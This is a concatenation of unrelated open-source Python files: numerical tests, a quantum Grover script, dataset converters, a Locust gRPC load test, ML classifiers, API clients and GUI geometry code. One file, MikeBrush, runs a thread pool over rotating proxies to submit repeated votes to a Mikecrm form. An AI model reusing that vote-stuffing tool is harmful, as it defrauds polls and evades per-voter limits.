f = function([x, y, z], b)
TestMatrix1 = np.asarray([[2, 1], [3, 4]])
TestMatrix2 = np.asarray([[17, 20], [43, 50]])
TestScalar = np.asarray(1)
f = function([x, y, z], b)
m = f(TestMatrix1, TestMatrix2, TestScalar)
assert np.allclose(TestMatrix2, np.dot(TestMatrix1, m[0]))
def test_wrong_coefficient_matrix(self):
x = vector()
y = vector()
z = scalar()
b = aesara.tensor.nlinalg.lstsq()(x, y, z)
f = function([x, y, z], b)
with pytest.raises(np.linalg.linalg.LinAlgError):
f([2, 1], [2, 1], 1)
def test_wrong_rcond_dimension(self):
x = vector()
y = vector()
z = vector()
b = aesara.tensor.nlinalg.lstsq()(x, y, z)
f = function([x, y, z], b)
with pytest.raises(np.linalg.LinAlgError):
f([2, 1], [2, 1], [2, 1])
class TestMatrixPower:
@config.change_flags(compute_test_value="raise")
@pytest.mark.parametrize("n", [-1, 0, 1, 2, 3, 4, 5, 11])
def test_numpy_compare(self, n):
a = np.array([[0.1231101, 0.72381381], [0.28748201, 0.43036511]]).astype(
config.floatX
)
A = matrix("A", dtype=config.floatX)
A.tag.test_value = a
Q = matrix_power(A, n)
n_p = np.linalg.matrix_power(a, n)
assert np.allclose(n_p, Q.get_test_value())
def test_non_square_matrix(self):
A = matrix("A", dtype=config.floatX)
Q = matrix_power(A, 3)
f = function([A], [Q])
a = np.array(
[
[0.47497769, 0.81869379],
[0.74387558, 0.31780172],
[0.54381007, 0.28153101],
]
).astype(config.floatX)
with pytest.raises(ValueError):
f(a)
class TestNormTests:
def test_wrong_type_of_ord_for_vector(self):
with pytest.raises(ValueError):
norm([2, 1], "fro")
def test_wrong_type_of_ord_for_matrix(self):
with pytest.raises(ValueError):
norm([[2, 1], [3, 4]], 0)
def test_non_tensorial_input(self):
with pytest.raises(ValueError):
norm(3, None)
def test_tensor_input(self):
with pytest.raises(NotImplementedError):
norm(np.random.rand(3, 4, 5), None)
def test_numpy_compare(self):
rng = np.random.RandomState(utt.fetch_seed())
M = matrix("A", dtype=config.floatX)
V = vector("V", dtype=config.floatX)
a = rng.rand(4, 4).astype(config.floatX)
b = rng.rand(4).astype(config.floatX)
A = (
[None, "fro", "inf", "-inf", 1, -1, None, "inf", "-inf", 0, 1, -1, 2, -2],
[M, M, M, M, M, M, V, V, V, V, V, V, V, V],
[a, a, a, a, a, a, b, b, b, b, b, b, b, b],
[None, "fro", inf, -inf, 1, -1, None, inf, -inf, 0, 1, -1, 2, -2],
)
for i in range(0, 14):
f = function([A[1][i]], norm(A[1][i], A[0][i]))
t_n = f(A[2][i])
n_n = np.linalg.norm(A[2][i], A[3][i])
assert _allclose(n_n, t_n)
class TestTensorInv(utt.InferShapeTester):
def setup_method(self):
super().setup_method()
self.A = tensor4("A", dtype=config.floatX)
self.B = tensor3("B", dtype=config.floatX)
self.a = np.random.rand(4, 6, 8, 3).astype(config.floatX)
self.b = np.random.rand(2, 15, 30).astype(config.floatX)
self.b1 = np.random.rand(30, 2, 15).astype(
config.floatX
) # for ind=1 since we need prod(b1.shape[:ind]) == prod(b1.shape[ind:])
def test_infer_shape(self):
A = self.A
Ai = tensorinv(A)
self._compile_and_check(
[A], # aesara.function inputs
[Ai], # aesara.function outputs
[self.a], # value to substitute
TensorInv,
)
def test_eval(self):
A = self.A
Ai = tensorinv(A)
n_ainv = np.linalg.tensorinv(self.a)
tf_a = function([A], [Ai])
t_ainv = tf_a(self.a)
assert _allclose(n_ainv, t_ainv)
B = self.B
Bi = tensorinv(B)
Bi1 = tensorinv(B, ind=1)
n_binv = np.linalg.tensorinv(self.b)
n_binv1 = np.linalg.tensorinv(self.b1, ind=1)
tf_b = function([B], [Bi])
tf_b1 = function([B], [Bi1])
t_binv = tf_b(self.b)
t_binv1 = tf_b1(self.b1)
assert _allclose(t_binv, n_binv)
assert _allclose(t_binv1, n_binv1)
|
the-stack_0_6598 | """
Prints which keys are pressed (0-4095), when any key is pressed or released.
The interrupt fires when any key is pressed or released.
"""
import mpr121
from machine import Pin
i2c = machine.I2C(3)
mpr = mpr121.MPR121(i2c)
# check all keys
def check(pin):
print(mpr.touched())
d3 = Pin('D3', Pin.IN, Pin.PULL_UP)
d3.irq(check, Pin.IRQ_FALLING)
|
the-stack_0_6600 | from dataclasses import dataclass, field
from typing import List
from xsdata.models.datatype import XmlPeriod
__NAMESPACE__ = "http://xstest-tns/schema11_D3_3_14_v01"
@dataclass
class Root:
class Meta:
name = "root"
namespace = "http://xstest-tns/schema11_D3_3_14_v01"
el_date: List[XmlPeriod] = field(
default_factory=list,
metadata={
"name": "elDate",
"type": "Element",
"namespace": "",
"min_occurs": 1,
"min_inclusive": XmlPeriod("---16+13:00"),
}
)
|
the-stack_0_6602 | import pyquil.quil as pq
import pyquil.api as api
from pyquil.gates import *
from grove.amplification.grover import Grover
import numpy as np
from grove.utils.utility_programs import ControlledProgramBuilder
import grove.amplification.oracles as oracle
def grovers(n, s):
"""
generates a pyquil program for grover search
:param n: number of qubits
:param s: number to search for (0 <= s <= 2^(n)-1)
:return: quantum program
"""
# Construct program
grover = pq.Program()
# set up minus
grover.inst(X(n))
grover.inst(H(n))
# grover_r = Grover()
for i in range(n):
grover.inst(H(i))
# BUILD UF (ONLY WORKS FOR 0 AS OF NOW)
U_f = np.identity(2**(n+1))
flip = s
U_f[flip][flip] = 0
U_f[2**(n+1)-1][flip] = 1
U_f[flip][2**(n+1)-1] = 1
U_f[2**(n+1)-1][2**(n+1)-1] = 0
grover.defgate('Uf', U_f)
string = ""
for i in range (n+1):
string += " "+str(i)
string2 = ""
for i in range(n ):
string2 += " " + str(i)
second = -1*np.identity(2 ** (n))
second[0][0] = 1
grover.defgate('second', second)
#for _ in range (int((np.pi *2**(n/2))/4)):
for _ in range(int(2**(n+2))):
# apply Uf
grover.inst('Uf' + string)
#grover.inst(SWAP(s, n+1))
for i in range(n):
grover.inst(H(i))
grover.inst("second" + string2)
for i in range(n):
grover.inst(H(i))
for i in range(n):
grover.measure(i)
return grover
if __name__ == "__main__":
qvm = api.SyncConnection()
for i in range(50):
p = grovers(6, 0)
#results = qvm.run(p, classical_addresses=[])
results = qvm.wavefunction(p)
print(results)
|
the-stack_0_6605 | import datetime
import json
import os
import re
import fnmatch
import cv2
from PIL import Image
import numpy as np
from pycococreatortools import pycococreatortools
ROOT_DIR = '../'
DATA_DIR = '/media/margery/4ABB9B07DF30B9DB/pythonDemo/medical_image_segmentation/Data/data_png_png'
ANNOTATION_TUMOR_DIR = '../test_tumor_mask'
ANNOTATION_WALL_DIR = '../test_wall_mask'
INFO = {
"description": "Rectal Cancer Dataset",
"url": "https://github.com/waspinator/pycococreator",
"version": "0.1.0",
"year": 2020,
"contributor": "PING MENG",
"date_created": datetime.datetime.utcnow().isoformat(' ')
}
LICENSES = [
{
"id": 1,
"name": "Attribution-NonCommercial-ShareAlike License",
"url": "http://creativecommons.org/licenses/by-nc-sa/2.0/"
}
]
# 根据自己的需要添加种类
CATEGORIES = [
{
'id': 0,
'name': 'Tumor',
'supercategory': 'Tumor',
},
{
'id': 1,
'name': 'RectalWall',
'supercategory': 'RectalWall'
}
]
def filter_for_jpeg(root, files):
file_types = ['*.jpeg', '*.jpg', '*.png']
file_types = r'|'.join([fnmatch.translate(x) for x in file_types])
files = [os.path.join(root, f) for f in files]
files = [f for f in files if re.match(file_types, f)]
return files
def filter_for_annotations(root, files, image_filename):
file_types = ['*.png']
file_types = r'|'.join([fnmatch.translate(x) for x in file_types])
basename_no_extension = os.path.splitext(os.path.basename(image_filename))[0]
# file_name_prefix = basename_no_extension + '.*'
file_name_prefix = basename_no_extension
files = [os.path.join(root, f) for f in files]
files = [f for f in files if re.match(file_types, f)]
files = [f for f in files if re.match(file_name_prefix, os.path.splitext(os.path.basename(f))[0][:10])]
return files
def main():
coco_output = {
"info": INFO,
"licenses": LICENSES,
"categories": CATEGORIES,
"images": [],
"annotations": []
}
image_id = 1
segmentation_id = 1
# data_list = [l.strip('\n') for l in open(os.path.join(DATA_DIR,'train.txt')).readlines()]
# data_list = [l.strip('\n') for l in open(os.path.join(DATA_DIR,'val.txt')).readlines()]
data_list = [file for file in os.listdir('/media/margery/4ABB9B07DF30B9DB/pythonDemo/tools/prepare_detection_dataset/imgs_rectal')]
for i in range(len(data_list)):
image = Image.open(os.path.join(DATA_DIR,'imgs',data_list[i]))
image_info = pycococreatortools.create_image_info(
image_id, os.path.basename(data_list[i]), image.size)
coco_output["images"].append(image_info)
# filter for associated png annotations
for (root, _, files), (rootw, w_, filesw) in zip(os.walk(ANNOTATION_TUMOR_DIR),os.walk(ANNOTATION_WALL_DIR)):
tumor_anno_files = filter_for_annotations(root, files, data_list[i])
wall_anno_files = filter_for_annotations(rootw, filesw, data_list[i])
# go through each associated annotation
for tumor_anno_filename in tumor_anno_files:
class_id = [x['id'] for x in CATEGORIES]
t_category_info = {'id': class_id[0], 'is_crowd': 0}
t_binary_mask = np.asarray(Image.open(tumor_anno_filename)
.convert('1')).astype(np.uint8)
t_anno_info = pycococreatortools.create_annotation_info(
segmentation_id, image_id, t_category_info, t_binary_mask,
image.size, tolerance=2)
if t_anno_info is not None:
coco_output["annotations"].append(t_anno_info)
segmentation_id = segmentation_id + 1
for wall_anno_filename in wall_anno_files:
class_id = [x['id'] for x in CATEGORIES]
w_category_info = {'id': class_id[1], 'is_crowd': 0}
w_binary_mask = np.asarray(Image.open(wall_anno_filename)
.convert('1')).astype(np.uint8)
w_anno_info = pycococreatortools.create_annotation_info(
segmentation_id, image_id, w_category_info, w_binary_mask,
image.size, tolerance=2)
if w_anno_info is not None:
coco_output["annotations"].append(w_anno_info)
segmentation_id = segmentation_id + 1
image_id = image_id + 1
with open('{}/rectal_seg_test.json'.format(ROOT_DIR), 'w') as output_json_file:
json.dump(coco_output, output_json_file)
if __name__ == "__main__":
main() |
the-stack_0_6606 | # make sure you use grpc version 1.39.0 or later,
# because of https://github.com/grpc/grpc/issues/15880 that affected earlier versions
import grpc
import hello_pb2_grpc
import hello_pb2
from locust import events, User, task
from locust.exception import LocustError
from locust.user.task import LOCUST_STATE_STOPPING
from hello_server import start_server
import gevent
import time
# patch grpc so that it uses gevent instead of asyncio
import grpc.experimental.gevent as grpc_gevent
grpc_gevent.init_gevent()
@events.init.add_listener
def run_grpc_server(environment, **_kwargs):
# Start the dummy server. This is not something you would do in a real test.
gevent.spawn(start_server)
class GrpcClient:
def __init__(self, stub):
self._stub_class = stub.__class__
self._stub = stub
def __getattr__(self, name):
func = self._stub_class.__getattribute__(self._stub, name)
def wrapper(*args, **kwargs):
request_meta = {
"request_type": "grpc",
"name": name,
"start_time": time.time(),
"response_length": 0,
"exception": None,
"context": None,
"response": None,
}
start_perf_counter = time.perf_counter()
try:
request_meta["response"] = func(*args, **kwargs)
request_meta["response_length"] = len(request_meta["response"].message)
except grpc.RpcError as e:
request_meta["exception"] = e
request_meta["response_time"] = (time.perf_counter() - start_perf_counter) * 1000
events.request.fire(**request_meta)
return request_meta["response"]
return wrapper
class GrpcUser(User):
abstract = True
stub_class = None
def __init__(self, environment):
super().__init__(environment)
for attr_value, attr_name in ((self.host, "host"), (self.stub_class, "stub_class")):
if attr_value is None:
raise LocustError(f"You must specify the {attr_name}.")
self._channel = grpc.insecure_channel(self.host)
self._channel_closed = False
stub = self.stub_class(self._channel)
self.client = GrpcClient(stub)
class HelloGrpcUser(GrpcUser):
host = "localhost:50051"
stub_class = hello_pb2_grpc.HelloServiceStub
@task
def sayHello(self):
if not self._channel_closed:
self.client.SayHello(hello_pb2.HelloRequest(name="Test"))
time.sleep(1)
|
the-stack_0_6608 | import numpy as np
import os
import sklearn
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
from sklearn.svm import LinearSVC
from sklearn.tree import DecisionTreeClassifier
from sklearn.naive_bayes import MultinomialNB
from sklearn.linear_model import RidgeClassifier
from sklearn.model_selection import train_test_split, KFold
from sklearn.metrics import classification_report, confusion_matrix
from pymongo import MongoClient
import datetime
import sys
sys.path.append('../..')
import utils.dbUtils
import utils.gensimUtils
client = MongoClient('localhost', 27017)
db = client.TFE
collection = db.results5
def train_and_test(experiment_id, max_features = None):
print("Using max features : {}".format(max_features))
idx = collection.insert_one({'date' : datetime.datetime.now(), 'corpus' : 'news_cleaned', 'max_features' : max_features, 'experiment_id' : experiment_id})
print("Making dataset")
train = utils.dbUtils.TokenizedIterator('news_cleaned', filters = {'type' : {'$in' : ['fake', 'reliable']}, 'domain' : {'$nin' : ['nytimes.com', 'beforeitsnews.com']}})
y_train = np.array([x for x in train.iterTags()])
test = utils.dbUtils.TokenizedIterator('news_cleaned', filters = {'type' : {'$in' : ['fake', 'reliable']}, 'domain' : {'$in' : ['nytimes.com', 'beforeitsnews.com']}})
y_test = np.array([x for x in test.iterTags()])
print("Fiting tf-idf")
vectorizer = TfidfVectorizer(max_features = max_features)
X_train = vectorizer.fit_transform([' '.join(news) for news in train])
X_test = vectorizer.transform([' '.join(news) for news in test])
print("Fiting linearSVC")
model = LinearSVC()
model.fit(X_train, y_train)
crp = classification_report(y_test, model.predict(X_test), labels=['fake', 'reliable'], output_dict = True)
collection.update_one({'_id' : idx.inserted_id},
{
'$push' :
{'report' :
{'model' : 'LinearSVC',
'classification_report' : crp,
'train_accuracy' : model.score(X_train, y_train),
'test_accuracy' : model.score(X_test, y_test),
'confusion matrix' :
{
'train' : list(map(int, confusion_matrix(y_train, model.predict(X_train), labels=['fake', 'reliable']).ravel())),
'test' : list(map(int, confusion_matrix(y_test, model.predict(X_test), labels=['fake', 'reliable']).ravel()))
}
}
}
})
print("MultinomialNB")
model = MultinomialNB()
model.fit(X_train, y_train)
crp = classification_report(y_test, model.predict(X_test), labels=['fake', 'reliable'], output_dict = True)
collection.update_one({'_id' : idx.inserted_id},
{
'$push' :
{'report' :
{'model' : 'MultinomialNB',
'classification_report' : crp,
'train_accuracy' : model.score(X_train, y_train),
'test_accuracy' : model.score(X_test, y_test),
'confusion matrix' :
{
'train' : list(map(int, confusion_matrix(y_train, model.predict(X_train), labels=['fake', 'reliable']).ravel())),
'test' : list(map(int, confusion_matrix(y_test, model.predict(X_test), labels=['fake', 'reliable']).ravel()))
}
}
}
})
print("DecisionTreeClassifier")
model = DecisionTreeClassifier()
model.fit(X_train, y_train)
crp = classification_report(y_test, model.predict(X_test), labels=['fake', 'reliable'], output_dict = True)
collection.update_one({'_id' : idx.inserted_id},
{
'$push' :
{'report' :
{'model' : 'DecisionTreeClassifier',
'classification_report' : crp,
'train_accuracy' : model.score(X_train, y_train),
'test_accuracy' : model.score(X_test, y_test),
'confusion matrix' :
{
'train' : list(map(int, confusion_matrix(y_train, model.predict(X_train), labels=['fake', 'reliable']).ravel())),
'test' : list(map(int, confusion_matrix(y_test, model.predict(X_test), labels=['fake', 'reliable']).ravel()))
}
}
}
})
print("RidgeClassifier")
model = RidgeClassifier()
model.fit(X_train, y_train)
crp = classification_report(y_test, model.predict(X_test), labels=['fake', 'reliable'], output_dict = True)
collection.update_one({'_id' : idx.inserted_id},
{
'$push' :
{'report' :
{'model' : 'RidgeClassifier',
'classification_report' : crp,
'train_accuracy' : model.score(X_train, y_train),
'test_accuracy' : model.score(X_test, y_test),
'confusion matrix' :
{
'train' : list(map(int, confusion_matrix(y_train, model.predict(X_train), labels=['fake', 'reliable']).ravel())),
'test' : list(map(int, confusion_matrix(y_test, model.predict(X_test), labels=['fake', 'reliable']).ravel()))
}
}
}
})
if __name__ == "__main__":
max_features = [10000, 50000, 100000, 250000, 500000, 1000000]
for features in max_features:
train_and_test(13, features) |
the-stack_0_6609 | import logging
from threading import Thread
from .mikecrm import Mikecrm
class MikeBrush():
def __init__(self, target, proxys, count):
'''
Brush for voting on mike
:param target: {"page":"", "data":""}
:param proxys: Queue for {"type":"", "ip":"", "port":00}
:param count: number of threadings
'''
self.target = target
self.proxys = proxys
self.count = count
self.total = 0
self.votes = 0
def brush_schedule(self, index):
proxys = self.proxys
brush = Mikecrm(**self.target)
logging.info('Brush thead-%d : task started!' % index)
while not proxys.empty():
proxy = proxys.get_nowait()
self.total += 1
if brush.set_proxy(*proxy).submit():
self.votes += 1
logging.info('Current successes count is %d / %d' % (self.votes, self.total))
logging.info('Brush thead-%d : task complete!' % index)
def run(self, block=True):
tasks = []
for index in range(self.count):
task = Thread(name='Theading-%d'%(index+1), target=self.brush_schedule, args=(index,))
tasks.append(task)
task.start()
logging.info('Brush tasks all started!')
if block:
for task in tasks:
task.join()
logging.info('Brush tasks all complete!')
|
the-stack_0_6610 | #!/usr/bin/env python
__all__ = ['soundcloud_download', 'soundcloud_download_by_id']
from ..common import *
import json
import urllib.error
client_id = 'WKcQQdEZw7Oi01KqtHWxeVSxNyRzgT8M'
def soundcloud_download_by_id(id, title=None, output_dir='.', merge=True, info_only=False):
assert title
url = 'https://api.soundcloud.com/tracks/{}/{}?client_id={}'.format(id, 'stream', client_id)
type, ext, size = url_info(url)
print_info(site_info, title, type, size)
if not info_only:
download_urls([url], title, ext, size, output_dir, merge = merge)
def soundcloud_i1_api(track_id):
url = 'https://api.soundcloud.com/i1/tracks/{}/streams?client_id={}'.format(track_id, client_id)
return json.loads(get_content(url))['http_mp3_128_url']
def soundcloud_download(url, output_dir='.', merge=True, info_only=False, **kwargs):
url = 'https://api.soundcloud.com/resolve.json?url={}&client_id={}'.format(url, client_id)
metadata = get_content(url)
info = json.loads(metadata)
title = info["title"]
real_url = info.get('download_url')
if real_url is None:
real_url = info.get('steram_url')
if real_url is None:
raise Exception('Cannot get media URI for {}'.format(url))
real_url = soundcloud_i1_api(info['id'])
mime, ext, size = url_info(real_url)
print_info(site_info, title, mime, size)
if not info_only:
download_urls([real_url], title, ext, size, output_dir, merge=merge)
site_info = "SoundCloud.com"
download = soundcloud_download
download_playlist = playlist_not_supported('soundcloud')
|
the-stack_0_6612 | import os
import pandas as pd
import yaml
from tqdm import tqdm
class ResLogger:
def __init__(self, path):
self.path = path
if not os.path.isdir(path):
os.mkdir(path)
# Infer the last result computation that has been run
if os.path.isfile(path+'res.csv'):
with open(path+'res.csv', 'r') as res:
lines = res.readlines()
# File is empty with no header
if len(lines) == 0:
self.header = False
self.last_run = None
# File has header
else:
first_line = lines[0]
last_line= lines[0]
self.columns = pd.Index((first_line[1:]
.rstrip().split(',')))
self.header = True
# File is empty with header
if last_line.split(',')[0] == 0:
self.last_run = None
# Previous result computations exists
else:
self.last_run = int(lines[-1].split(',')[0])
# If result file does not exist
else:
self.header = False
self.last_run = None
def __enter__(self):
self.res = open(self.path+'res.csv', 'a').__enter__()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.res.__exit__(exc_type, exc_value, traceback)
def write_header(self, columns):
self.columns = columns
for column in columns:
self.res.write(','+column)
self.res.write('\n')
def write_res(self, idx, res_series):
res_list = res_series[self.columns].values
self.res.write(str(idx))
for res in res_list:
self.res.write(','+str(res))
self.res.write('\n')
def run_simulations(path, net, metrics, simulation_step_func,
until=None, overwrite=False):
# Load simulation inputs
with open(path+'input_config.yaml', 'r') as config_file:
eq_list = yaml.safe_load(config_file)
eq_frame_dict = {}
for (element, quantity) in eq_list:
eq_frame = pd.read_csv(path+f'{element}_{quantity}.csv',
index_col=0)
eq_frame_dict[(element, quantity)] = eq_frame
# Set final simulation step
if until==None:
stop = len(eq_frame.index)
else:
stop = until
# Logic for applying n-th inputs and running simulation step
def set_eq_and_run(n):
for (e_name, q_name), q_value in eq_frame_dict.items():
q_series = pd.Series(q_value.loc[n, :], name=q_name)
set_eq_by_element_name(net, e_name, q_series)
return simulation_step_func(net, metrics)
# Check progress with logger
with ResLogger(path) as l:
# If no header, run zeroth simulation step to infer column names
if not l.header:
progress = iter(tqdm(range(stop)))
results = set_eq_and_run(next(progress))
l.write_header(results.index)
l.write_res(0, results)
# If header but no last run, start from beginning
elif not l.last_run:
progress = tqdm(range(stop))
# Otherwise start after last run
else:
progress = tqdm(range(l.last_run + 1, stop))
# Main loop
for n in progress:
results = set_eq_and_run(n)
l.write_res(n, results)
def init_simulations(path, eq_frame_dict):
if not os.path.isdir(path):
os.mkdir(path)
eq_list = []
for (element, quantity), eq_frame in eq_frame_dict.items():
eq_frame.to_csv(path+f'{element}_{quantity}.csv')
eq_list.append([element, quantity])
with open(path+'input_config.yaml', 'w') as config_file:
yaml.dump(eq_list, config_file)
def set_eq_by_element_name(net, element, eq_series):
pp_idx = getattr(net, element + '_name_map')[eq_series.index]
getattr(net, element).loc[pp_idx, eq_series.name] = eq_series.values |
the-stack_0_6617 | # coding:utf-8
import os
import logging
import datetime
import requests
import json
from pagarme.config import __endpoint__, __user_agent__
from pagarme.common import merge_dict, make_url
from pagarme import exceptions
logger = logging.getLogger('pygarme')
class PagarmeApi(object):
def __init__(self, options=None, **kwargs):
"""`PagarmeApi`:class: Creates an API object
"""
kwargs = merge_dict(options or {}, kwargs)
self.endpoint = kwargs.get('endpoint', self.default_endpoint)
self.apikey = kwargs.get('api_key')
self.encryption_key = kwargs.get('encryption_key')
if not self.apikey or not self.encryption_key:
raise exceptions.NullAPIKeyError('The `api_key` and `encryption_key` must be set.')
@property
def default_endpoint(self):
"""Returns the default endpoint
"""
return __endpoint__
@property
def default_user_agent(self):
"""Returns the api user agent
"""
return __user_agent__
@property
def default_headers(self):
"""Returns the default headers
"""
return {
"Content-Type": "application/json",
"Accept": "application/json",
"User-Agent": self.default_user_agent
}
def request(self, url, method, data=None, headers=None):
"""Makes a HTTP call, formats response and does error handling.
"""
http_headers = merge_dict(self.default_headers, headers or {})
request_data = merge_dict({'api_key': self.apikey}, data or {})
logger.info('HTTP %s REQUEST TO %s' % (method, url))
start = datetime.datetime.now()
try:
response = requests.request(method=method, url=url, data=json.dumps(request_data),
headers=http_headers)
except exceptions.BadRequestError as e:
return json.loads({'errors': e.content})
duration = datetime.datetime.now() - start
logger.info('RESPONSE %s DURATION %s.%s' % (response.encoding, duration.seconds,
duration.microseconds))
return json.loads(response.content) if response.content else {}
def get(self, action, params=None, headers=None):
"""Makes a GET request
"""
return self.request(make_url(self.endpoint, action), method='GET', data=params,
headers=headers)
def post(self, action, data=None, headers=None):
"""Makes a GET request
"""
return self.request(make_url(self.endpoint, action), method='POST', data=data,
headers=headers)
def put(self, action, data=None, headers=None):
"""Makes a GET request
"""
return self.request(make_url(self.endpoint, action), method='PUT', data=data,
headers=headers)
def delete(self, action, headers=None):
"""Makes a GET request
"""
return self.request(make_url(self.endpoint, action), method='DELETE',
headers=headers)
__default_api__ = None
def default_api():
global __default_api__
if __default_api__ is None:
try:
api_key = os.environ["PAGARME_API_KEY"]
encryption_key = os.environ["PAGARME_ENCRYPTION_KEY"]
except KeyError:
raise exceptions.NullAPIKeyError("Required PAGARME_API_KEY and PAGARME_ENCRYPTION_KEY")
__default_api__ = PagarmeApi(api_key=api_key, encryption_key=encryption_key)
return __default_api__
def configure(**kwargs):
global __default_api__
__default_api__ = PagarmeApi(**kwargs)
return __default_api__
|
the-stack_0_6620 | #!/usr/bin/python
# -*- coding: utf-8 -*-
try:
from PyQt5.QtGui import *
from PyQt5.QtCore import *
except ImportError:
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from libs.utils import distance
import sys
DEFAULT_LINE_COLOR = QColor(0, 255, 0, 128)
DEFAULT_FILL_COLOR = QColor(255, 0, 0, 128)
DEFAULT_SELECT_LINE_COLOR = QColor(255, 255, 255)
DEFAULT_SELECT_FILL_COLOR = QColor(0, 128, 255, 155)
DEFAULT_VERTEX_FILL_COLOR = QColor(0, 255, 0, 255)
DEFAULT_HVERTEX_FILL_COLOR = QColor(255, 0, 0)
MIN_Y_LABEL = 10
class Shape(object):
P_SQUARE, P_ROUND = range(2)
MOVE_VERTEX, NEAR_VERTEX = range(2)
# The following class variables influence the drawing
# of _all_ shape objects.
line_color = DEFAULT_LINE_COLOR
fill_color = DEFAULT_FILL_COLOR
select_line_color = DEFAULT_SELECT_LINE_COLOR
select_fill_color = DEFAULT_SELECT_FILL_COLOR
vertex_fill_color = DEFAULT_VERTEX_FILL_COLOR
hvertex_fill_color = DEFAULT_HVERTEX_FILL_COLOR
point_type = P_ROUND
point_size = 8
scale = 1.0
def __init__(self, label=None, line_color=None, difficult=False, paintLabel=False):
self.label = label
self.points = []
self.fill = False
self.selected = False
self.difficult = difficult
self.paintLabel = paintLabel
self._highlightIndex = None
self._highlightMode = self.NEAR_VERTEX
self._highlightSettings = {
self.NEAR_VERTEX: (4, self.P_ROUND),
self.MOVE_VERTEX: (1.5, self.P_SQUARE),
}
self._closed = False
if line_color is not None:
# Override the class line_color attribute
# with an object attribute. Currently this
# is used for drawing the pending line a different color.
self.line_color = line_color
def close(self):
self._closed = True
def setPoints(self, points):
self.points = []
for p in points:
self.points.append(QPointF(p[0],p[1]))
def reachMaxPoints(self):
if len(self.points) >= 4:
return True
return False
def addPoint(self, point):
if not self.reachMaxPoints():
self.points.append(point)
def popPoint(self):
if self.points:
return self.points.pop()
return None
def isClosed(self):
return self._closed
def setOpen(self):
self._closed = False
def paint(self, painter):
if self.points:
color = self.select_line_color if self.selected else self.line_color
pen = QPen(color)
# Try using integer sizes for smoother drawing(?)
pen.setWidth(max(1, int(round(2.0 / self.scale))))
painter.setPen(pen)
line_path = QPainterPath()
vrtx_path = QPainterPath()
line_path.moveTo(self.points[0])
# Uncommenting the following line will draw 2 paths
# for the 1st vertex, and make it non-filled, which
# may be desirable.
#self.drawVertex(vrtx_path, 0)
for i, p in enumerate(self.points):
line_path.lineTo(p)
self.drawVertex(vrtx_path, i)
if self.isClosed():
line_path.lineTo(self.points[0])
painter.drawPath(line_path)
painter.drawPath(vrtx_path)
painter.fillPath(vrtx_path, self.vertex_fill_color)
# Draw text at the top-left
if self.paintLabel:
min_x = sys.maxsize
min_y = sys.maxsize
for point in self.points:
min_x = min(min_x, point.x())
min_y = min(min_y, point.y())
if min_x != sys.maxsize and min_y != sys.maxsize:
font = QFont()
font.setPointSize(8)
font.setBold(True)
painter.setFont(font)
if(self.label == None):
self.label = ""
if(min_y < MIN_Y_LABEL):
min_y += MIN_Y_LABEL
painter.drawText(min_x, min_y, self.label)
if self.fill:
color = self.select_fill_color if self.selected else self.fill_color
painter.fillPath(line_path, color)
def drawVertex(self, path, i):
d = self.point_size / self.scale
shape = self.point_type
point = self.points[i]
if i == self._highlightIndex:
size, shape = self._highlightSettings[self._highlightMode]
d *= size
if self._highlightIndex is not None:
self.vertex_fill_color = self.hvertex_fill_color
else:
self.vertex_fill_color = Shape.vertex_fill_color
if shape == self.P_SQUARE:
path.addRect(point.x() - d / 2, point.y() - d / 2, d, d)
elif shape == self.P_ROUND:
path.addEllipse(point, d / 2.0, d / 2.0)
else:
assert False, "unsupported vertex shape"
def nearestVertex(self, point, epsilon):
for i, p in enumerate(self.points):
if distance(p - point) <= epsilon:
return i
return None
def containsPoint(self, point):
return self.makePath().contains(point)
def makePath(self):
path = QPainterPath(self.points[0])
for p in self.points[1:]:
path.lineTo(p)
return path
def boundingRect(self):
return self.makePath().boundingRect()
def moveBy(self, offset):
self.points = [p + offset for p in self.points]
def moveVertexBy(self, i, offset):
self.points[i] = self.points[i] + offset
def highlightVertex(self, i, action):
self._highlightIndex = i
self._highlightMode = action
def highlightClear(self):
self._highlightIndex = None
def copy(self):
shape = Shape("%s" % self.label)
shape.points = [p for p in self.points]
shape.fill = self.fill
shape.selected = self.selected
shape._closed = self._closed
if self.line_color != Shape.line_color:
shape.line_color = self.line_color
if self.fill_color != Shape.fill_color:
shape.fill_color = self.fill_color
shape.difficult = self.difficult
return shape
def __len__(self):
return len(self.points)
def __getitem__(self, key):
return self.points[key]
def __setitem__(self, key, value):
self.points[key] = value
|
the-stack_0_6623 | from setuptools import setup, find_packages
with open('README.md') as f:
readme = f.read()
setup(
name='midi-websocket-server',
version='1.0.0',
description='Python Websocket server to facilitate two-way communication with all connected MIDI devices.',
long_description=readme,
url='https://github.com/PeterSR/python-midi-websocket-server',
author='Peter Severin Rasmussen',
author_email='[email protected]',
license='MIT',
classifiers=[
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.7',
],
packages=find_packages(exclude=('tests', 'docs')),
install_requires=[
'websockets>=8.1',
'python-rtmidi>=1.4.0',
],
python_requires='>=3.7',
) |
the-stack_0_6625 | # Copyright 2021 BlackRock, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import cast
import numpy as np
import numpy.typing as npt
def shubert(x1: float, x2: float) -> float:
"""https://www.sfu.ca/~ssurjano/shubert.html."""
factor_1 = np.sum([i * np.cos((i + 1) * x1 + i) for i in range(1, 6)])
factor_2 = np.sum([i * np.cos((i + 1) * x2 + i) for i in range(1, 6)])
return cast(float, factor_1 * factor_2)
def shubert_np(x: npt.NDArray[np.floating]) -> float:
if len(x) != 2:
raise AssertionError("Exactly 2 items expected")
return shubert(x[0], x[1])
|
the-stack_0_6628 | from vector2D import Vector2D as vec
from typing import List, Tuple
Point = Tuple[int, int]
def ear_clipping(polygon: List[Point]) -> List[List[Point]]:
if len(polygon) > 3:
polygon = vec.convert(polygon)
total_triangles = len(polygon) - 2
triangles = []
while len(triangles) < total_triangles:
for ind, center_point in enumerate(polygon):
right_point = polygon[(ind + 1) % len(polygon)]
left_point = polygon[(ind - 1) % len(polygon)]
if left_point.cross(right_point, origin=center_point) > 0:
temp_triangle = (left_point, center_point, right_point)
